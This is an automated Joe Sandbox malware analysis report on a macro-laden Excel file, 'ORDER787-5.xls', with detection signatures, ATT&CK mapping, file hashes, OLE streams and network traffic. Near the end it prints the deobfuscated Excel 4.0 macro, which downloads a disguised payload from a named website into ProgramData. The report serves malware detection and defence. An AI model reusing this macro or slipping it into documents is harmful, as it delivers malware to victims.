Analysis Report ORDER787-5.xls
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell |
Source: | Author: Michael Haag, Florian Roth, Markus Neis: |
Signature Overview |
---|
AV Detection: |
---|
Multi AV Scanner detection for dropped file |
Source: | ReversingLabs: |
Software Vulnerabilities: |
---|
Document exploit detected (drops PE files) |
Source: | File created: |
Document exploit detected (UrlDownloadToFile) |
Source: | Section loaded: |
Document exploit detected (process start blacklist hit) |
Source: | Process created: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Networking: |
---|
Found malicious URLs in unpacked macro 4.0 sheet |
Source: | Macro 4.0 Deobfuscator: |
Source: | JA3 fingerprint: |
Source: | File created: |
Source: | String found in binary or memory: |
Source: | DNS traffic detected: |
Source: | Network traffic detected: |
System Summary: |
---|
Found malicious Excel 4.0 Macro |
Source: | Initial sample: |
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) |
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas |
Source: | Initial sample: |
Found abnormal large hidden Excel 4.0 Macro sheet |
Source: | Initial sample: |
Office process drops PE file |
Source: | File created: |
Source: | Memory allocated: |
Source: | Code function: | 4_2_1000B826 | |
Source: | Code function: | 4_2_10009C77 | |
Source: | Code function: | 4_2_1000BD68 | |
Source: | Code function: | 4_2_1000C96E | |
Source: | Code function: | 4_2_10005DD0 | |
Source: | Code function: | 4_2_1000D667 | |
Source: | Code function: | 4_2_1000C2AA | |
Source: | Code function: | 4_2_1000E6DC | |
Source: | Code function: | 4_2_100057AA |
Source: | OLE indicator, VBA macros: |
Source: | Code function: |
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | File created: |
Source: | OLE indicator, Workbook stream: |
Source: | File read: |
Source: | Key opened: |
Source: | Process created: |
Source: | Window detected: |
Source: | Key opened: |
Source: | File opened: |
Source: | Initial sample: |
Source: | Code function: | 4_2_100018B0 |
Source: | Code function: | 4_2_10005DC4 | |
Source: | Code function: | 4_2_1000A671 | |
Source: | Code function: | 4_2_0035214D | |
Source: | Code function: | 4_2_0035214D |
Source: | File created: |
Source: | Process information set: |
Source: | Stream path 'Workbook' entropy: |
Source: | Dropped PE file which has not been started: |
Source: | Code function: | 4_2_100018B0 |
Source: | Code function: | 4_2_10004844 |
Source: | Code function: | 4_2_100018B0 |
Source: | Code function: | 4_2_001A0456 | |
Source: | Code function: | 4_2_001A095E | |
Source: | Code function: | 4_2_001E1030 |
Source: | Code function: | 4_2_10002AB0 |
Source: | Code function: | 4_2_10004844 | |
Source: | Code function: | 4_2_10005081 | |
Source: | Code function: | 4_2_100050A3 | |
Source: | Code function: | 4_2_1000A672 | |
Source: | Code function: | 4_2_100026C4 |
Source: | Process created: |
Source: | Code function: | 4_2_100090B2 |
Source: | Code function: | 4_2_1000E4AD |
Source: | Code function: | 4_2_10007F84 |
Source: | Code function: | 4_2_10002AB0 |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting31 | Path Interception | Process Injection11 | Masquerading11 | OS Credential Dumping | System Time Discovery1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Native API1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | Security Software Discovery12 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | Exploitation for Client Execution33 | Logon Script (Windows) | Logon Script (Windows) | Process Injection11 | Security Account Manager | File and Directory Discovery1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information1 | NTDS | System Information Discovery24 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol2 | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting31 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information21 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Rundll321 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
5% | Virustotal | Browse | ||
4% | ReversingLabs | Script.Trojan.Heuristic |
Dropped Files |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
15% | ReversingLabs | |||
15% | ReversingLabs |
Unpacked PE Files |
---|
Source | Detection | Scanner | Label | Link | Download |
---|---|---|---|---|---|
100% | Avira | TR/Crypt.XPACK.Gen | Download File |
Domains |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
1% | Virustotal | Browse | ||
2% | Virustotal | Browse |
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
4% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
penrithdentalimplants.com.au | 160.153.76.195 | true | false | | unknown |
www.penrithdentalimplants.com.au | unknown | unknown | false | | unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
true |
| unknown | ||
false | high |
Contacted IPs |
---|
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
160.153.76.195 | unknown | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | false |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Red Diamond |
Analysis ID: | 336129 |
Start date: | 05.01.2021 |
Start time: | 13:00:07 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 35s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | ORDER787-5.xls |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of new started processes analysed: | 7 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.expl.evad.winXLS@7/13@1/1 |
EGA Information: | Failed |
HDC Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
Warnings: |
|
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
13:00:52 | API Interceptor |
Joe Sandbox View / Context |
---|
IPs |
---|
No context |
---|
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
AS-26496-GO-DADDY-COM-LLCUS | | | malicious | | |
JA3 Fingerprints |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
7dcce5b76c8b17472d024758970a406b | | | malicious | | |
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 327680 |
Entropy (8bit): | 7.594344556420887 |
Encrypted: | false |
SSDEEP: | 6144:TkgbkwkCOtK/0C74zwkF1vjA77XR/RYvetp:T/bgCO8SzwkF1vUDXYvetp |
MD5: | 1A57412AB2EDD77103FD75768BA146DD |
SHA1: | 81599A9B526C16B2A0A82CADCB8ACAAC6781EC81 |
SHA-256: | 7AB75BC888C6DD0457098D4539D9C86C3F1358A3B0C1A262F2BB8287E2BAC917 |
SHA-512: | 7679B32035D95E5563EAD9D54D8EF810C20913DA702D983A23C66FC51E9F00647556BEE2BA48803BD13B1340744C78AAEA835BB9C247E616480595043DE9566A |
Malicious: | true |
Antivirus: |
|
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 58936 |
Entropy (8bit): | 7.994797855729196 |
Encrypted: | true |
SSDEEP: | 768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj |
MD5: | E4F1E21910443409E81E5B55DC8DE774 |
SHA1: | EC0885660BD216D0CDD5E6762B2F595376995BD0 |
SHA-256: | CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5 |
SHA-512: | 2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 326 |
Entropy (8bit): | 3.1104823335779463 |
Encrypted: | false |
SSDEEP: | 6:kKekMSwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:lWkPlE99SNxAhUegeT2 |
MD5: | 88D01B15C32DC5F54651F0A97864E0EF |
SHA1: | 1396AB210AF8B93B30E8A46FBB83DAE780B84B11 |
SHA-256: | AD6121D0521AEAE4EFA83923B306C43A8EA2B74184AE0C898F6BACB4B8046702 |
SHA-512: | 0CEA566ADBCA3DE2C4AA21799DD19B9B755A7B355953144BDB20BFF927B81E897EB3A4EEFAAA7E57D94EB9D361BC45FADA0669EFA346FEFF4F8B0E248C0C5C8C |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 327680 |
Entropy (8bit): | 7.594344556420887 |
Encrypted: | false |
SSDEEP: | 6144:TkgbkwkCOtK/0C74zwkF1vjA77XR/RYvetp:T/bgCO8SzwkF1vUDXYvetp |
MD5: | 1A57412AB2EDD77103FD75768BA146DD |
SHA1: | 81599A9B526C16B2A0A82CADCB8ACAAC6781EC81 |
SHA-256: | 7AB75BC888C6DD0457098D4539D9C86C3F1358A3B0C1A262F2BB8287E2BAC917 |
SHA-512: | 7679B32035D95E5563EAD9D54D8EF810C20913DA702D983A23C66FC51E9F00647556BEE2BA48803BD13B1340744C78AAEA835BB9C247E616480595043DE9566A |
Malicious: | true |
Antivirus: |
|
Reputation: | low |
IE Cache URL: | https://www.penrithdentalimplants.com.au/ls/apperolew.png |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2128 |
Entropy (8bit): | 2.131067658554214 |
Encrypted: | false |
SSDEEP: | 24:YW7VoaaP0yGLCfVxwj4LoFjh0JtxlggL0lue:NPazfVxwji5Ax |
MD5: | A4CD320321FB7CB36DCDBE18372DB7F6 |
SHA1: | 2214C8B629049D3FCAA14F59636C884A4A2AC765 |
SHA-256: | 382EFF7970B1157CA3CC1DE889E7BBC92BA06E2E9992FFB1E515C27C5B914EC2 |
SHA-512: | 395C094254E8B9E076527D452AC039397F5ACAB0171DBA7338F4571D33771124585FDDDBB35AEDDDB0A022BC9626DBFF761850E41AEBFE0CC25CBD0CE308CA6A |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2128 |
Entropy (8bit): | 2.077588804474407 |
Encrypted: | false |
SSDEEP: | 24:Ywl/V3uaP0z4GmXIfzCsf3dte3YLaFnuOlehywoy/://QaRYfGi3do3l8 |
MD5: | D2F8C79A51EC1F551B9233C6FD1083EA |
SHA1: | 73FB2CA087FB85B595A981D499ACB31C156BB71C |
SHA-256: | 5C748A589C0EEA58A5664F62DD15E3B06CC436A8E5A30918F881793A8743379B |
SHA-512: | 341687BE2080E7BA0E6D778A4C013D1742745D294D94FAED19626BF4C050048D0C0D47D838D1F7092985D3873D63CC8B78A74F6569F8D299DF82159E79581E19 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 241332 |
Entropy (8bit): | 4.206848634864182 |
Encrypted: | false |
SSDEEP: | 1536:cGILEQNSk8SCtKBX0Gpb2vxKHnVMOkOX0mRO/NIAIQK7viKAJYsA0ppDCLTfMRsi:cdNNSk8DtKBrpb2vxrOpprf/nVq |
MD5: | 93F2225BF5FFD6C4E480793CA89F0CBB |
SHA1: | 901730BE002933D11806C6417D1B35C794AFB953 |
SHA-256: | 968744AFB8FBEE61678CD949E38D7B4AC80073A40A90CC1E865C56621F0A925D |
SHA-512: | F01FAEBCEDD8D7C3B4C8404387A3BEF66E95853ECDCCFDE641261A32CC12C22C81D810E3E2FB161099756F64462C3B9DBC35733C55C9A3D84E5C81FBDBC35EBD |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 148333 |
Entropy (8bit): | 7.862613200850918 |
Encrypted: | false |
SSDEEP: | 3072:/wW92ouB+ctexrUW/HlaLuZl4KKB/BtVhdoMOmLtlbTy:/ZxuZexI0lSh/BbhdoMOmK |
MD5: | F172F8A0B25CB105FD588B810003BE34 |
SHA1: | A8317748F41F50D28FCCCC7CA11C74DC524D67D2 |
SHA-256: | E011EC839076E4F99839C495FA3B3BD70246EBF39B593724DA51B1E314263A0D |
SHA-512: | 5E004E3F06C46A17F4904344AECB42E7C030D1166D31AF0D904730ED689FDECA1F87A00B808D01B9E4C901BD9C4CBD35713EE77576E493BB7950455C88045D66 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 152533 |
Entropy (8bit): | 6.31602258454967 |
Encrypted: | false |
SSDEEP: | 1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA |
MD5: | D0682A3C344DFC62FB18D5A539F81F61 |
SHA1: | 09D3E9B899785DA377DF2518C6175D70CCF9DA33 |
SHA-256: | 4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A |
SHA-512: | 0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.496574117992861 |
Encrypted: | false |
SSDEEP: | 12:85QhenCLgXg/XAlCPCHaXtB8XzB/lzUX+WnicvbsW1bDtZ3YilMMEpxRljKHTdJU:85vU/XTd6jHUYe7Dv3qWrNru/ |
MD5: | F477EDF49DB8F29FA1F7E8563873054A |
SHA1: | C39AC7E0ACF6C289AD7EE4FDC23C4D2E3778C550 |
SHA-256: | 3232C9EC5CC69786EEB55B4CA42C340AB196433A6F9D10B69104223F03C9FE55 |
SHA-512: | 8A43D696AE55466F73669264D320BAD18A4AB8A0DB0BCDC2ED7F446BC377FCB664B9EB300293E7835CD48B0118F9EECF727E10F1271B7BD3525985AA040E4474 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 4056 |
Entropy (8bit): | 4.528803921190274 |
Encrypted: | false |
SSDEEP: | 96:8TW/XojFrsgKWQh2TW/XojFrsgKWQh2TW/XojFrsgKWQh2TW/XojFrsgKWQ/:8bjFwg7QEbjFwg7QEbjFwg7QEbjFwg7g |
MD5: | BE347C89A9A76E5DF8F2035AF09871FF |
SHA1: | A5D5164AB3B388822846783B1D4543BA19C788C5 |
SHA-256: | 9F0967ED9573F54FB9A4EFFF1208E6DC8DF58792191F759F7B4BDBD5A3ADC0FF |
SHA-512: | 8FF4F2D97F45401FF6F53E48B1A2C56099DC71BD38BB386E7DAE90B77C9DA33A96D3FDF0905FC1687DDA31A88B4C5DE15E73270992E1CD4F63324A7B8870AFC6 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | modified |
Size (bytes): | 169 |
Entropy (8bit): | 4.42743505414388 |
Encrypted: | false |
SSDEEP: | 3:oyBVomMkQurYCyG3urYCmMkQurYCyG3urYCmMkQurYCyG3urYCmMkQurYCv:dj6kQZC3ZUkQZC3ZUkQZC3ZUkQZs |
MD5: | 4232FA4840865D1AC196D3F04B274801 |
SHA1: | BB30CFD9644E02C3A4766006AC5DDDD11684B15F |
SHA-256: | D10AC2C8001288BBB4AD0E1A10572DEC3E549158FDDC2042084613941D17ACD7 |
SHA-512: | 7ADAAF43B2E7CA5E4578B1E7F16F219CD331A50190036490FFEDA1B30E44F656D61C4848ABA6F5DD5EA365F63C346254872F6E54FD6D531394992A9954F69B18 |
Malicious: | false |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.881888506863549 |
TrID: |
|
File name: | ORDER787-5.xls |
File size: | 165376 |
MD5: | 1d97c6cb50c4107498e4f0e76f539f0c |
SHA1: | a4dc090837c76aed324bea19c9f62e2d47bb7bc8 |
SHA256: | 1b761a682092f8be6c7e9eef709be08a7105159a5e4ffb7722b0530fba308ba4 |
SHA512: | 08c580cbb19b3684f96ab82ec358ca42b796d52045c71d7f794f91d745b62f184d0b1c6842dd6577fb2a0b762bd236f1d1d593b3c592767788fda08739b025a3 |
SSDEEP: | 3072:6D/0mXgqPYJJv0Cl04gsDDNEnRL/WL018klfOPxHfoVsfMJETA24CLjmbzafPRj:6z/PE2hyDJEBW6plWPGi4ENmbza3 |
File Icon |
---|
Icon Hash: | e4eea286a4b4bcb4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "ORDER787-5.xls" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Excel |
Encrypted Document: | True |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1251 |
Author: | |
Last Saved By: | |
Create Time: | 2006-09-16 00:00:00 |
Last Saved Time: | 2021-01-04 17:53:11 |
Creating Application: | |
Security: | 1 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Thumbnail Scaling Desired: | False |
Contains Dirty Links: | False |
Shared Document: | False |
Changed Hyperlinks: | False |
Application Version: | 983040 |
Streams |
---|
Stream Path: \x1CompObj, File Type: data, Stream Size: 102 |
---|
General | |
---|---|
Stream Path: | \x1CompObj |
File Type: | data |
Stream Size: | 102 |
Entropy: | 4.1769286656 |
Base64 Encoded: | True |
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 280 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 280 |
Entropy: | 3.26288952551 |
Base64 Encoded: | False |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 200 |
Entropy: | 3.27412475502 |
Base64 Encoded: | False |
Stream Path: Ctls, File Type: data, Stream Size: 68 |
---|
General | |
---|---|
Stream Path: | Ctls |
File Type: | data |
Stream Size: | 68 |
Entropy: | 3.77907363839 |
Base64 Encoded: | False |
Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 154550 |
---|
General | |
---|---|
Stream Path: | Workbook |
File Type: | Applesoft BASIC program data, first line number 16 |
Stream Size: | 154550 |
Entropy: | 7.98610242414 |
Base64 Encoded: | True |
Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ISO-8859 text, with CRLF line terminators, Stream Size: 387 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/PROJECT |
File Type: | ISO-8859 text, with CRLF line terminators |
Stream Size: | 387 |
Entropy: | 5.00967281416 |
Base64 Encoded: | True |
Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 20 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/PROJECTwm |
File Type: | data |
Stream Size: | 20 |
Entropy: | 3.04643934467 |
Base64 Encoded: | False |
Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2767 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/VBA/_VBA_PROJECT |
File Type: | data |
Stream Size: | 2767 |
Entropy: | 3.97981669814 |
Base64 Encoded: | False |
Data ASCII: | . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . |
Data Raw: | cc 61 a3 00 00 01 00 ff 19 04 00 00 09 04 00 00 e3 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00 |
Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 728 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/VBA/dir |
File Type: | data |
Stream Size: | 728 |
Entropy: | 6.37265666305 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . ) 3 . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . - |
Data Raw: | 01 d4 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 29 33 e3 61 05 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47 |
Stream Path: _VBA_PROJECT_CUR/VBA/\x1051\x1080\x1089\x10901, File Type: data, Stream Size: 1127 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/VBA/\x1051\x1080\x1089\x10901 |
File Type: | data |
Stream Size: | 1127 |
Entropy: | 3.56364076858 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . . . . . . $ . . . . . . . 8 . . . . . . . . . . . . . . . H . . . . . . . c . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . L i s t B o x 1 , 2 , 0 , M S F o r m s , L i s t B o x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . |
Data Raw: | 01 16 01 00 00 14 01 00 00 18 03 00 00 f8 00 00 00 24 02 00 00 ff ff ff ff 38 03 00 00 8c 03 00 00 00 00 00 00 01 00 00 00 48 1c e9 9f 00 00 ff ff 63 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
Macro 4.0 Code |
---|
CALL("URLMon", "URLDownloadToFileA", "JJCCJJ", 0, ="https://www.penrithdentalimplants.com.au/ls/apperolew.png", C:\ProgramData\activex.ocx, 0, 0)
"=""https://www.penrithdentalimplants.com.au/ls/apperolew.png"""
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 5, 2021 13:01:10.410703897 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.410706997 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.410727978 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.410736084 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.410751104 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.410774946 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.410784006 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.410798073 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.410820007 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.410820961 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.410840988 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.410855055 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.410864115 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.410885096 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.410892963 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.410908937 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.410921097 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.410931110 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.410949945 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.410955906 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.410979033 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:10.410979986 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:10.411001921 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
